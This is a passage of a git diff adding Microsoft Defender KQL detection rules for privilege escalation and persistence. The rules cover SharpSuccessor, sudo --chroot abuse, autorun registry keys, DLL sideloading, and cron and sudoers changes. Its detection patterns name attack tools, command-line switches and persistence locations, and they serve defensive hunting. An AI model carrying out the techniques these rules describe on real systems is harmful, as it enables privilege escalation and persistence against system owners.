"\\winPEASx86.exe")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/hktl_sharpsuccessor_privilege_escalation_tool_execution.kql b/KQL/rules/Privilege Escalation/hktl_sharpsuccessor_privilege_escalation_tool_execution.kql new file mode 100644 index 00000000..a757525a --- /dev/null +++ b/KQL/rules/Privilege Escalation/hktl_sharpsuccessor_privilege_escalation_tool_execution.kql @@ -0,0 +1,12 @@ +// Title: HKTL - SharpSuccessor Privilege Escalation Tool Execution +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-06-06 +// Level: high +// Description: Detects the execution of SharpSuccessor, a tool used to exploit the BadSuccessor attack for privilege escalation in WinServer 2025 Active Directory environments. +Successful usage of this tool can let the attackers gain the domain admin privileges by exploiting the BadSuccessor vulnerability. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.t1068 + +DeviceProcessEvents +| where FolderPath endswith "\\SharpSuccessor.exe" or ProcessVersionInfoOriginalFileName =~ "SharpSuccessor.exe" or ProcessCommandLine contains "SharpSuccessor" or (ProcessCommandLine contains " add " and ProcessCommandLine contains " /impersonate" and ProcessCommandLine contains " /path" and ProcessCommandLine contains " /account" and ProcessCommandLine contains " /name") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/internet_explorer_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/internet_explorer_autorun_keys_modification.kql new file mode 100644 index 00000000..4b4f7048 --- /dev/null +++ b/KQL/rules/Privilege Escalation/internet_explorer_autorun_keys_modification.kql @@ -0,0 +1,13 @@ +// Title: Internet Explorer Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) +// Date: 2019-10-25 +// Level: medium +// Description: Detects modification of autostart extensibility point (ASEP) in registry. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason +// - Legitimate administrator sets up autorun keys for legitimate reason + +DeviceRegistryEvents +| where (RegistryKey contains "\\Software\\Wow6432Node\\Microsoft\\Internet Explorer" or RegistryKey contains "\\Software\\Microsoft\\Internet Explorer") and (RegistryKey contains "\\Toolbar" or RegistryKey contains "\\Extensions" or RegistryKey contains "\\Explorer Bars") and (not((RegistryValueData =~ "(Empty)" or (RegistryKey contains "\\Extensions\\{2670000A-7350-4f3c-8081-5663EE0C6C49}" or RegistryKey contains "\\Extensions\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}" or RegistryKey contains "\\Extensions\\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}" or RegistryKey contains "\\Extensions\\{A95fe080-8f5d-11d2-a20b-00aa003c157a}") or (RegistryKey endswith "\\Toolbar\\ShellBrowser\\ITBar7Layout" or RegistryKey endswith "\\Toolbar\\ShowDiscussionButton" or RegistryKey endswith "\\Toolbar\\Locked")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/launch_agent_daemon_execution_via_launchctl.kql b/KQL/rules/Privilege Escalation/launch_agent_daemon_execution_via_launchctl.kql new file mode 100644 index 00000000..52bc1612 --- /dev/null +++ b/KQL/rules/Privilege Escalation/launch_agent_daemon_execution_via_launchctl.kql @@ -0,0 +1,12 @@ +// Title: Launch Agent/Daemon Execution Via Launchctl +// Author: Pratinav Chandra +// Date: 2024-05-13 +// Level: medium +// Description: Detects the execution of programs as Launch Agents or Launch Daemons using launchctl on macOS. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1569.001, attack.t1543.001, attack.t1543.004 +// False Positives: +// - Legitimate administration activities is expected to trigger false positives. Investigate the command line being passed to determine if the service or launch agent are suspicious. + +DeviceProcessEvents +| where (ProcessCommandLine contains "submit" or ProcessCommandLine contains "load" or ProcessCommandLine contains "start") and FolderPath endswith "/launchctl" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/linux_sudo_chroot_execution.kql b/KQL/rules/Privilege Escalation/linux_sudo_chroot_execution.kql new file mode 100644 index 00000000..d2986a52 --- /dev/null +++ b/KQL/rules/Privilege Escalation/linux_sudo_chroot_execution.kql @@ -0,0 +1,16 @@ +// Title: Linux Sudo Chroot Execution +// Author: Swachchhanda Shrawn Poudel (Nextron Systems) +// Date: 2025-10-02 +// Level: low +// Description: Detects the execution of 'sudo' command with '--chroot' option, which is used to change the root directory for command execution. +Attackers may use this technique to evade detection and execute commands in a modified environment. +This can be part of a privilege escalation strategy, as it allows the execution of commands with elevated privileges in a controlled environment as seen in CVE-2025-32463. +While investigating, look out for unusual or unexpected use of 'sudo --chroot' in conjunction with other commands or scripts such as execution from temporary directories or unusual user accounts. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.t1068 +// False Positives: +// - Legitimate administrative tasks or scripts that use 'sudo --chroot' for containerization, testing, or system management. + +DeviceProcessEvents +| where (ProcessCommandLine contains " --chroot " or ProcessCommandLine contains "sudo -R ") and FolderPath endswith "/sudo" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/microsoft_sync_center_suspicious_network_connections.kql b/KQL/rules/Privilege Escalation/microsoft_sync_center_suspicious_network_connections.kql new file mode 100644 index 00000000..f5b3a770 --- /dev/null +++ b/KQL/rules/Privilege Escalation/microsoft_sync_center_suspicious_network_connections.kql @@ -0,0 +1,10 @@ +// Title: Microsoft Sync Center Suspicious Network Connections +// Author: elhoim +// Date: 2022-04-28 +// Level: medium +// Description: Detects suspicious connections from Microsoft Sync Center to non-private IPs. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.t1055, attack.t1218, attack.execution, attack.defense-evasion + +DeviceNetworkEvents +| where InitiatingProcessFolderPath endswith "\\mobsync.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/narrator_s_feedback_hub_persistence.kql b/KQL/rules/Privilege Escalation/narrator_s_feedback_hub_persistence.kql new file mode 100644 index 00000000..d521f26a --- /dev/null +++ b/KQL/rules/Privilege Escalation/narrator_s_feedback_hub_persistence.kql @@ -0,0 +1,10 @@ +// Title: Narrator's Feedback-Hub Persistence +// Author: Dmitriy Lifanov, oscd.community +// Date: 2019-10-25 +// Level: high +// Description: Detects abusing Windows 10 Narrator's Feedback-Hub +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 + +DeviceRegistryEvents +| where (ActionType =~ "DeleteValue" and RegistryKey endswith "\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\Shell\\open\\command\\DelegateExecute") or RegistryKey endswith "\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\Shell\\open\\command\\(Default)" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/network_connection_initiated_via_notepad_exe.kql b/KQL/rules/Privilege Escalation/network_connection_initiated_via_notepad_exe.kql new file mode 100644 index 00000000..ce0452d8 --- /dev/null +++ b/KQL/rules/Privilege Escalation/network_connection_initiated_via_notepad_exe.kql @@ -0,0 +1,15 @@ +// Title: Network Connection Initiated Via Notepad.EXE +// Author: EagleEye Team +// Date: 2020-05-14 +// Level: high +// Description: Detects a network connection that is initiated by the "notepad.exe" process. +This might be a sign of process injection from a beacon process or something similar. +Notepad rarely initiates a network communication except when printing documents for example. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.command-and-control, attack.execution, attack.defense-evasion, attack.t1055 +// False Positives: +// - Printing documents via notepad might cause communication with the printer via port 9100 or similar. + +DeviceNetworkEvents +| where InitiatingProcessFolderPath endswith "\\notepad.exe" and (not(RemotePort == 9100)) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/new_activescripteventconsumer_created_via_wmic_exe.kql b/KQL/rules/Privilege Escalation/new_activescripteventconsumer_created_via_wmic_exe.kql new file mode 100644 index 00000000..adca6786 --- /dev/null +++ b/KQL/rules/Privilege Escalation/new_activescripteventconsumer_created_via_wmic_exe.kql @@ -0,0 +1,12 @@ +// Title: New ActiveScriptEventConsumer Created Via Wmic.EXE +// Author: Florian Roth (Nextron Systems) +// Date: 2021-06-25 +// Level: high +// Description: Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.003 +// False Positives: +// - Legitimate software creating script event consumers + +DeviceProcessEvents +| where ProcessCommandLine contains "ActiveScriptEventConsumer" and ProcessCommandLine contains " CREATE " \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/new_custom_shim_database_created.kql b/KQL/rules/Privilege Escalation/new_custom_shim_database_created.kql new file mode 100644 index 00000000..44b10093 --- /dev/null +++ b/KQL/rules/Privilege Escalation/new_custom_shim_database_created.kql @@ -0,0 +1,14 @@ +// Title: New Custom Shim Database Created +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-12-29 +// Level: medium +// Description: Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. +The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.009 +// False Positives: +// - Legitimate custom SHIM installations will also trigger this rule + +DeviceFileEvents +| where FolderPath contains ":\\Windows\\apppatch\\Custom\\" or FolderPath contains ":\\Windows\\apppatch\\CustomSDB\\" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/new_dns_serverlevelplugindll_installed.kql b/KQL/rules/Privilege Escalation/new_dns_serverlevelplugindll_installed.kql new file mode 100644 index 00000000..307db5e0 --- /dev/null +++ b/KQL/rules/Privilege Escalation/new_dns_serverlevelplugindll_installed.kql @@ -0,0 +1,10 @@ +// Title: New DNS ServerLevelPluginDll Installed +// Author: Florian Roth (Nextron Systems) +// Date: 2017-05-08 +// Level: high +// Description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required) +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.t1112 + +DeviceRegistryEvents +| where RegistryKey endswith "\\services\\DNS\\Parameters\\ServerLevelPluginDll" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/new_dns_serverlevelplugindll_installed_via_dnscmd_exe.kql b/KQL/rules/Privilege Escalation/new_dns_serverlevelplugindll_installed_via_dnscmd_exe.kql new file mode 100644 index 00000000..bec45db7 --- /dev/null +++ b/KQL/rules/Privilege Escalation/new_dns_serverlevelplugindll_installed_via_dnscmd_exe.kql @@ -0,0 +1,10 @@ +// Title: New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE +// Author: Florian Roth (Nextron Systems) +// Date: 2017-05-08 +// Level: high +// Description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required) +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.t1112 + +DeviceProcessEvents +| where (ProcessCommandLine contains "/config" and ProcessCommandLine contains "/serverlevelplugindll") and FolderPath endswith "\\dnscmd.exe" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/new_netsh_helper_dll_registered_from_a_suspicious_location.kql b/KQL/rules/Privilege Escalation/new_netsh_helper_dll_registered_from_a_suspicious_location.kql new file mode 100644 index 00000000..f761f8ed --- /dev/null +++ b/KQL/rules/Privilege Escalation/new_netsh_helper_dll_registered_from_a_suspicious_location.kql @@ -0,0 +1,11 @@ +// Title: New Netsh Helper DLL Registered From A Suspicious Location +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-11-28 +// Level: high +// Description: Detects changes to the Netsh registry key to add a new DLL value that is located on a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.007 + +DeviceRegistryEvents +| where RegistryKey contains "\\SOFTWARE\\Microsoft\\NetSh" and ((RegistryValueData contains ":\\Perflogs\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\Temporary Internet") or ((RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favorites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favourites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Contacts\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Pictures\\"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/new_outlook_macro_created.kql b/KQL/rules/Privilege Escalation/new_outlook_macro_created.kql new file mode 100644 index 00000000..022ba935 --- /dev/null +++ b/KQL/rules/Privilege Escalation/new_outlook_macro_created.kql @@ -0,0 +1,12 @@ +// Title: New Outlook Macro Created +// Author: @ScoubiMtl +// Date: 2021-04-05 +// Level: medium +// Description: Detects the creation of a macro file for Outlook. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.command-and-control, attack.t1137, attack.t1008, attack.t1546 +// False Positives: +// - User genuinely creates a VB Macro for their email + +DeviceFileEvents +| where InitiatingProcessFolderPath endswith "\\outlook.exe" and FolderPath endswith "\\Microsoft\\Outlook\\VbaProject.OTM" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/new_run_key_pointing_to_suspicious_folder.kql b/KQL/rules/Privilege Escalation/new_run_key_pointing_to_suspicious_folder.kql new file mode 100644 index 00000000..0dabaaa0 --- /dev/null +++ b/KQL/rules/Privilege Escalation/new_run_key_pointing_to_suspicious_folder.kql @@ -0,0 +1,12 @@ +// Title: New RUN Key Pointing to Suspicious Folder +// Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing, Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2018-08-25 +// Level: high +// Description: Detects suspicious new RUN key element pointing to an executable in a suspicious folder +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Software using weird folders for updates + +DeviceRegistryEvents +| where (RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" or RegistryKey contains "\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run" or RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run") and ((RegistryValueData contains ":\\Perflogs" or RegistryValueData contains ":\\ProgramData'" or RegistryValueData contains ":\\Windows\\Temp" or RegistryValueData contains ":\\Temp" or RegistryValueData contains "\\AppData\\Local\\Temp" or RegistryValueData contains "\\AppData\\Roaming" or RegistryValueData contains ":\\$Recycle.bin" or RegistryValueData contains ":\\Users\\Default" or RegistryValueData contains ":\\Users\\public" or RegistryValueData contains "%temp%" or RegistryValueData contains "%tmp%" or RegistryValueData contains "%Public%" or RegistryValueData contains "%AppData%") or (RegistryValueData contains ":\\Users\\" and (RegistryValueData contains "\\Favorites" or RegistryValueData contains "\\Favourites" or RegistryValueData contains "\\Contacts" or RegistryValueData contains "\\Music" or RegistryValueData contains "\\Pictures" or RegistryValueData contains "\\Documents" or RegistryValueData contains "\\Photos"))) and (not(((RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "C:\\Windows\\Temp\\") and (RegistryValueData contains "rundll32.exe " and RegistryValueData contains "C:\\WINDOWS\\system32\\advpack.dll,DelNodeRunDLL32") and InitiatingProcessFolderPath startswith "C:\\Windows\\SoftwareDistribution\\Download\\" and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\RunOnce*"))) and (not((RegistryValueData endswith "Spotify.exe --autostart --minimized" and (InitiatingProcessFolderPath endswith "C:\\Program Files\\Spotify\\Spotify.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files (x86)\\Spotify\\Spotify.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Roaming\\Spotify\\Spotify.exe") and RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Spotify"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/office_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/office_autorun_keys_modification.kql new file mode 100644 index 00000000..d15f18ab --- /dev/null +++ b/KQL/rules/Privilege Escalation/office_autorun_keys_modification.kql @@ -0,0 +1,13 @@ +// Title: Office Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) +// Date: 2019-10-25 +// Level: medium +// Description: Detects modification of autostart extensibility point (ASEP) in registry. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason +// - Legitimate administrator sets up autorun keys for legitimate reason + +DeviceRegistryEvents +| where ((RegistryKey contains "\\Word\\Addins" or RegistryKey contains "\\PowerPoint\\Addins" or RegistryKey contains "\\Outlook\\Addins" or RegistryKey contains "\\Onenote\\Addins" or RegistryKey contains "\\Excel\\Addins" or RegistryKey contains "\\Access\\Addins" or RegistryKey contains "test\\Special\\Perf") and (RegistryKey contains "\\Software\\Wow6432Node\\Microsoft\\Office" or RegistryKey contains "\\Software\\Microsoft\\Office")) and (not((RegistryValueData =~ "(Empty)" or ((InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Office\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\msiexec.exe" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\regsvr32.exe") and (RegistryKey endswith "\\Excel\\Addins\\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1*" or RegistryKey endswith "\\Excel\\Addins\\ExcelPlugInShell.PowerMapConnect*" or RegistryKey endswith "\\Excel\\Addins\\NativeShim*" or RegistryKey endswith "\\Excel\\Addins\\NativeShim.InquireConnector.1*" or RegistryKey endswith "\\Excel\\Addins\\PowerPivotExcelClientAddIn.NativeEntry.1*" or RegistryKey endswith "\\Outlook\\AddIns\\AccessAddin.DC*" or RegistryKey endswith "\\Outlook\\AddIns\\ColleagueImport.ColleagueImportAddin*" or RegistryKey endswith "\\Outlook\\AddIns\\EvernoteCC.EvernoteContactConnector*" or RegistryKey endswith "\\Outlook\\AddIns\\EvernoteOLRD.Connect*" or RegistryKey endswith "\\Outlook\\Addins\\Microsoft.VbaAddinForOutlook.1*" or RegistryKey endswith "\\Outlook\\Addins\\OcOffice.OcForms*" or RegistryKey contains "\\Outlook\\Addins\\OneNote.OutlookAddin" or RegistryKey endswith "\\Outlook\\Addins\\OscAddin.Connect*" or RegistryKey endswith "\\Outlook\\Addins\\OutlookChangeNotifier.Connect*" or RegistryKey contains "\\Outlook\\Addins\\UCAddin.LyncAddin.1" or RegistryKey contains "\\Outlook\\Addins\\UCAddin.UCAddin.1" or RegistryKey endswith "\\Outlook\\Addins\\UmOutlookAddin.FormRegionAddin*" or RegistryKey contains "AddinTakeNotesService\\FriendlyName")) or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\"))))) and (not((((InitiatingProcessFolderPath in~ ("C:\\Program Files\\Avast Software\\Avast\\RegSvr.exe", "C:\\Program Files\\Avast Software\\Avast\\x86\\RegSvr.exe")) and RegistryKey endswith "\\Microsoft\\Office\\Outlook\\Addins\\Avast.AsOutExt*") or ((InitiatingProcessFolderPath in~ ("C:\\Program Files\\AVG\\Antivirus\\RegSvr.exe", "C:\\Program Files\\AVG\\Antivirus\\x86\\RegSvr.exe")) and RegistryKey endswith "\\Microsoft\\Office\\Outlook\\Addins\\Antivirus.AsOutExt*")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/outlook_macro_execution_without_warning_setting_enabled.kql b/KQL/rules/Privilege Escalation/outlook_macro_execution_without_warning_setting_enabled.kql new file mode 100644 index 00000000..2bdb2f95 --- /dev/null +++ b/KQL/rules/Privilege Escalation/outlook_macro_execution_without_warning_setting_enabled.kql @@ -0,0 +1,12 @@ +// Title: Outlook Macro Execution Without Warning Setting Enabled +// Author: @ScoubiMtl +// Date: 2021-04-05 +// Level: high +// Description: Detects the modification of Outlook security setting to allow unprompted execution of macros. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.command-and-control, attack.t1137, attack.t1008, attack.t1546 +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where RegistryValueData contains "0x00000001" and RegistryKey endswith "\\Outlook\\Security\\Level" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/password_set_to_never_expire_via_wmi.kql b/KQL/rules/Privilege Escalation/password_set_to_never_expire_via_wmi.kql new file mode 100644 index 00000000..99dd7739 --- /dev/null +++ b/KQL/rules/Privilege Escalation/password_set_to_never_expire_via_wmi.kql @@ -0,0 +1,13 @@ +// Title: Password Set to Never Expire via WMI +// Author: Daniel Koifman (KoifSec) +// Date: 2025-07-30 +// Level: medium +// Description: Detects the use of wmic.exe to modify user account settings and explicitly disable password expiration. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1047, attack.t1098 +// False Positives: +// - Legitimate administrative activity + +DeviceProcessEvents +| where (ProcessCommandLine contains "useraccount" and ProcessCommandLine contains " set " and ProcessCommandLine contains "passwordexpires" and ProcessCommandLine contains "false") and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/persistence_via_cron_files.kql b/KQL/rules/Privilege Escalation/persistence_via_cron_files.kql new file mode 100644 index 00000000..5a6ded70 --- /dev/null +++ b/KQL/rules/Privilege Escalation/persistence_via_cron_files.kql @@ -0,0 +1,12 @@ +// Title: Persistence Via Cron Files +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +// Date: 2021-10-15 +// Level: medium +// Description: Detects creation of cron file or files in Cron directories which could indicates potential persistence. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.003 +// False Positives: +// - Any legitimate cron file. + +DeviceFileEvents +| where (FolderPath startswith "/etc/cron.d/" or FolderPath startswith "/etc/cron.daily/" or FolderPath startswith "/etc/cron.hourly/" or FolderPath startswith "/etc/cron.monthly/" or FolderPath startswith "/etc/cron.weekly/" or FolderPath startswith "/var/spool/cron/crontabs/") or (FolderPath contains "/etc/cron.allow" or FolderPath contains "/etc/cron.deny" or FolderPath contains "/etc/crontab") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/persistence_via_sudoers_files.kql b/KQL/rules/Privilege Escalation/persistence_via_sudoers_files.kql new file mode 100644 index 00000000..fed1a190 --- /dev/null +++ b/KQL/rules/Privilege Escalation/persistence_via_sudoers_files.kql @@ -0,0 +1,12 @@ +// Title: Persistence Via Sudoers Files +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-05 +// Level: medium +// Description: Detects creation of sudoers file or files in "sudoers.d" directory which can be used a potential method to persiste privileges for a specific user. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.003 +// False Positives: +// - Creation of legitimate files in sudoers.d folder part of administrator work + +DeviceFileEvents +| where FolderPath startswith "/etc/sudoers.d/" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_com_object_hijacking_via_treatas_subkey_registry.kql b/KQL/rules/Privilege Escalation/potential_com_object_hijacking_via_treatas_subkey_registry.kql new file mode 100644 index 00000000..03fea458 --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_com_object_hijacking_via_treatas_subkey_registry.kql @@ -0,0 +1,12 @@ +// Title: Potential COM Object Hijacking Via TreatAs Subkey - Registry +// Author: Kutepov Anton, oscd.community +// Date: 2019-10-23 +// Level: medium +// Description: Detects COM object hijacking via TreatAs subkey +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015 +// False Positives: +// - Maybe some system utilities in rare cases use linking keys for backward compatibility + +DeviceRegistryEvents +| where (ActionType =~ "RegistryKeyCreated" and (RegistryKey endswith "HKU*" and RegistryKey endswith "Classes\\CLSID*" and RegistryKey contains "\\TreatAs")) and (not(InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\svchost.exe")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_dll_injection_or_execution_using_tracker_exe.kql b/KQL/rules/Privilege Escalation/potential_dll_injection_or_execution_using_tracker_exe.kql new file mode 100644 index 00000000..b126ae78 --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_dll_injection_or_execution_using_tracker_exe.kql @@ -0,0 +1,10 @@ +// Title: Potential DLL Injection Or Execution Using Tracker.exe +// Author: Avneet Singh @v3t0_, oscd.community +// Date: 2020-10-18 +// Level: medium +// Description: Detects potential DLL injection and execution using "Tracker.exe" +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055.001 + +DeviceProcessEvents +| where ((ProcessCommandLine contains " /d " or ProcessCommandLine contains " /c ") and (FolderPath endswith "\\tracker.exe" or ProcessVersionInfoFileDescription =~ "Tracker")) and (not((ProcessCommandLine contains " /ERRORREPORT:PROMPT " or (InitiatingProcessFolderPath endswith "\\Msbuild\\Current\\Bin\\MSBuild.exe" or InitiatingProcessFolderPath endswith "\\Msbuild\\Current\\Bin\\amd64\\MSBuild.exe")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_dbgmodel_dll.kql b/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_dbgmodel_dll.kql new file mode 100644 index 00000000..fe67df0a --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_dbgmodel_dll.kql @@ -0,0 +1,12 @@ +// Title: Potential DLL Sideloading Of DbgModel.DLL +// Author: Gary Lobermier +// Date: 2024-07-11 +// Level: medium +// Description: Detects potential DLL sideloading of "DbgModel.dll" +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 +// False Positives: +// - Legitimate applications loading their own versions of the DLL mentioned in this rule + +DeviceImageLoadEvents +| where FolderPath endswith "\\dbgmodel.dll" and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) and (not((FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.WinDbg_" or (FolderPath startswith "C:\\Program Files (x86)\\Windows Kits\\" or FolderPath startswith "C:\\Program Files\\Windows Kits\\")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_mpsvc_dll.kql b/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_mpsvc_dll.kql new file mode 100644 index 00000000..259d82d6 --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_mpsvc_dll.kql @@ -0,0 +1,12 @@ +// Title: Potential DLL Sideloading Of MpSvc.DLL +// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema +// Date: 2024-07-11 +// Level: medium +// Description: Detects potential DLL sideloading of "MpSvc.dll". +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 +// False Positives: +// - Legitimate applications loading their own versions of the DLL mentioned in this rule. + +DeviceImageLoadEvents +| where FolderPath endswith "\\MpSvc.dll" and (not((FolderPath startswith "C:\\Program Files\\Windows Defender\\" or FolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_mscorsvc_dll.kql b/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_mscorsvc_dll.kql new file mode 100644 index 00000000..9669b6a4 --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_mscorsvc_dll.kql @@ -0,0 +1,12 @@ +// Title: Potential DLL Sideloading Of MsCorSvc.DLL +// Author: Wietze Beukema +// Date: 2024-07-11 +// Level: medium +// Description: Detects potential DLL sideloading of "mscorsvc.dll". +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 +// False Positives: +// - Legitimate applications loading their own versions of the DLL mentioned in this rule. + +DeviceImageLoadEvents +| where FolderPath endswith "\\mscorsvc.dll" and (not((FolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework\\" or FolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework64\\" or FolderPath startswith 